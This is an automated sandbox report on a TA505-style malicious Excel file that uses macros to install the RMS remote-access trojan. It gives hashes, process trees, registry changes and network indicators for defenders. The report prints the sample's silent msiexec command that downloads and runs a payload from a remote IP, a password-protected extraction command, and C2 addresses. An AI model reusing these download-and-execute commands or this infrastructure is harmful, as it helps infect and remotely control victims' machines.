analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

CRT84477_0419.xls

Full analysis: https://app.any.run/tasks/b86a410c-9c88-4d7f-96f3-a25e720ecb10
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: May 24, 2019, 20:25:12
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
exe-to-msi
loader
rat
rms
ta505
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: Microsoft Office, Last Saved By: 1, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Dec 19 10:42:12 2018, Last Saved Time/Date: Fri Apr 19 09:35:24 2019, Security: 0
MD5:

A4454AAEE9B25A02D7478FF64D7D8FB7

SHA1:

A4416C840194C754D0849B289D91036DDDB456F3

SHA256:

FB3C0A4449B1D97AA759C2D47BFBE6D82C0466C6B5BF58A5BD8637314BC2A871

SSDEEP:

3072:DKpb8rGYrMPelwhKmFV5xtezEsgrdgHZB7QB9oZXagBByVyrrpUQjeKgfaOLEsC:DKpb8rGYrMPelwhKmFV5xtuEsgrdgrER

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 2964)
    • Uses Microsoft Installer as loader

      • EXCEL.EXE (PID: 2964)
    • Application was dropped or rewritten from another process

      • uninstall.exe (PID: 2920)
      • exit.exe (PID: 2992)
      • exit.exe (PID: 3312)
      • winserv.exe (PID: 1500)
    • Downloads executable files from IP

      • msiexec.exe (PID: 2432)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 2432)
    • Loads dropped or rewritten executable

      • cmd.exe (PID: 3192)
    • Changes the autorun value in the registry

      • reg.exe (PID: 3896)
    • RMS RAT was detected

      • winserv.exe (PID: 1500)
  • SUSPICIOUS

    • Drop ExeToMSI Application

      • msiexec.exe (PID: 2432)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 2432)
      • cmd.exe (PID: 3192)
      • MSI2B22.tmp (PID: 2208)
      • uninstall.exe (PID: 2920)
    • Starts CMD.EXE for commands execution

      • exit.exe (PID: 2992)
      • exit.exe (PID: 3312)
    • Creates files in the program directory

      • uninstall.exe (PID: 2920)
    • Uses REG.EXE to modify Windows registry

      • cmd.exe (PID: 3640)
    • Reads Environment values

      • winserv.exe (PID: 1500)
    • Reads the machine GUID from the registry

      • winserv.exe (PID: 1500)
    • Reads Windows Product ID

      • winserv.exe (PID: 1500)
    • Creates files in the user directory

      • winserv.exe (PID: 1500)
    • Uses TASKKILL.EXE to kill process

      • cmd.exe (PID: 3640)
  • INFO

    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 2432)
    • Starts application with an unusual extension

      • msiexec.exe (PID: 2432)
    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2964)
    • Application was dropped or rewritten from another process

      • MSI2B22.tmp (PID: 2208)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

Author: Microsoft Office
LastModifiedBy: 1
Software: Microsoft Excel
CreateDate: 2018:12:19 10:42:12
ModifyDate: 2019:04:19 08:35:24
Security: None
CodePage: Windows Cyrillic
Company: Microsoft Corporation
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
  • 1
  • 2
HeadingPairs:
  • Листы
  • 1
  • Макросы Excel 4.0
  • 1
CompObjUserTypeLen: 26
CompObjUserType: ???? Microsoft Excel 2003
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
221
Monitored processes
186
Malicious processes
9
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start drop and start drop and start excel.exe no specs msiexec.exe no specs msiexec.exe msi2b22.tmp exit.exe no specs cmd.exe ping.exe no specs ping.exe no specs uninstall.exe exit.exe no specs cmd.exe no specs reg.exe #RMS winserv.exe taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2964"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
584msiexec.exe RETURN=404 /i http://169.239.128.168/dynhost /q DIR='%TMP%' C:\Windows\system32\msiexec.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
2432C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
2208"C:\Windows\Installer\MSI2B22.tmp"C:\Windows\Installer\MSI2B22.tmp
msiexec.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2992"C:\Users\admin\AppData\Local\Temp\exit.exe" C:\Users\admin\AppData\Local\Temp\exit.exeMSI2B22.tmp
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3192cmd /c i.cmdC:\Windows\system32\cmd.exe
exit.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1008ping www.cloudflare.com -n 3 -w 3000C:\Windows\system32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2336ping www.cloudflare.com -n 3 -w 1000C:\Windows\system32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2920uninstall.exe x -p3KPnoNJ3ReME4bEU5W9APkKS5ErkR3tNRT -yC:\Users\admin\AppData\Local\Temp\uninstall.exe
cmd.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3312"C:\ProgramData\LemonTrack Installer\exit.exe" C:\ProgramData\LemonTrack Installer\exit.exeuninstall.exe
User:
admin
Integrity Level:
MEDIUM
Total events
1 962
Read events
1 878
Write events
65
Delete events
19

Modification events

(PID) Process:(2964) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Operation:writeName:`.9
Value:
602E3900940B0000010000000000000000000000
(PID) Process:(2964) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(2964) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(2964) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
Operation:writeName:MTTT
Value:
940B0000563E54D36E12D50100000000
(PID) Process:(2964) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Operation:delete valueName:`.9
Value:
602E3900940B0000010000000000000000000000
(PID) Process:(2964) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Operation:delete keyName:
Value:
(PID) Process:(2964) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency
Operation:delete keyName:
Value:
(PID) Process:(2964) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(2964) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(2964) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\121343
Operation:writeName:121343
Value:
04000000940B00003300000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C00430052005400380034003400370037005F0030003400310039002E0078006C007300000000002200000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C00010000000000000010A861D46E12D501431312004313120000000000AC020000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Executable files
7
Suspicious files
4
Text files
13
Unknown types
3

Dropped files

PID
Process
Filename
Type
2964EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRE60.tmp.cvr
MD5:
SHA256:
2432msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF811B0F4C2B3FD13C.TMP
MD5:
SHA256:
2432msiexec.exeC:\Users\admin\AppData\Local\Temp\~DFFF092F0BD0C967A4.TMP
MD5:
SHA256:
2432msiexec.exeC:\Config.Msi\122a08.rbsbinary
MD5:637F200F9342D29A50FDB0EC5E5E98EC
SHA256:7D70862172F1E612905641BE56D1F69F59B9D36ACBFFC0108B41156A504CF890
2432msiexec.exeC:\Windows\Installer\122a07.ipibinary
MD5:5FD8ACCBCF3B9C5443905F062034F15D
SHA256:1182A386D11DC8D50318B4AB6EDAA14FD6DAB7D09498893458C06160A1DE38E8
2432msiexec.exeC:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\index.datdat
MD5:99AF255E1A000998551075E4676346FC
SHA256:7B91C722E9B916F3FC2420EA49175516C3E107CDEFBAE0E3F8605E8A05A7D704
2432msiexec.exeC:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\desktop.iniini
MD5:4A3DEB274BB5F0212C2419D3D8D08612
SHA256:2842973D15A14323E08598BE1DFB87E54BF88A76BE8C7BC94C56B079446EDF38
3192cmd.exeC:\Users\admin\AppData\Local\Temp\uninstall.exeexecutable
MD5:573A2619AF8C3DE0C3F376D8B100DB69
SHA256:17B20AA770CCF250B5ADED470FBBAA329856543022BA21F993D5FA02EBB670C7
2432msiexec.exeC:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\YHDJP63O\desktop.iniini
MD5:4A3DEB274BB5F0212C2419D3D8D08612
SHA256:2842973D15A14323E08598BE1DFB87E54BF88A76BE8C7BC94C56B079446EDF38
2432msiexec.exeC:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\5HQFI52S\desktop.iniini
MD5:4A3DEB274BB5F0212C2419D3D8D08612
SHA256:2842973D15A14323E08598BE1DFB87E54BF88A76BE8C7BC94C56B079446EDF38
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2432
msiexec.exe
GET
200
169.239.128.168:80
http://169.239.128.168/dynhost
ZA
executable
3.95 Mb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1500
winserv.exe
159.69.48.50:5655
US
suspicious
2432
msiexec.exe
169.239.128.168:80
Zappie Host LLC
ZA
suspicious

DNS requests

Domain
IP
Reputation
www.cloudflare.com
  • 104.17.210.9
  • 104.17.209.9
whitelisted

Threats

PID
Process
Class
Message
2432
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file
2432
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
2 ETPRO signatures available at the full report
Process
Message
winserv.exe
Error WTSQueryUserToken #1314
winserv.exe
24-05-2019_21:25:42:599#T:Error #20 @2
winserv.exe
24-05-2019_21:26:12:505#T:Msg Size: 104
winserv.exe
24-05-2019_21:26:12:505#T:Msg code: 3
winserv.exe
24-05-2019_21:26:12:505#T:MSG_KEEP_ALIVE
winserv.exe
MSG_KEEP_ALIVE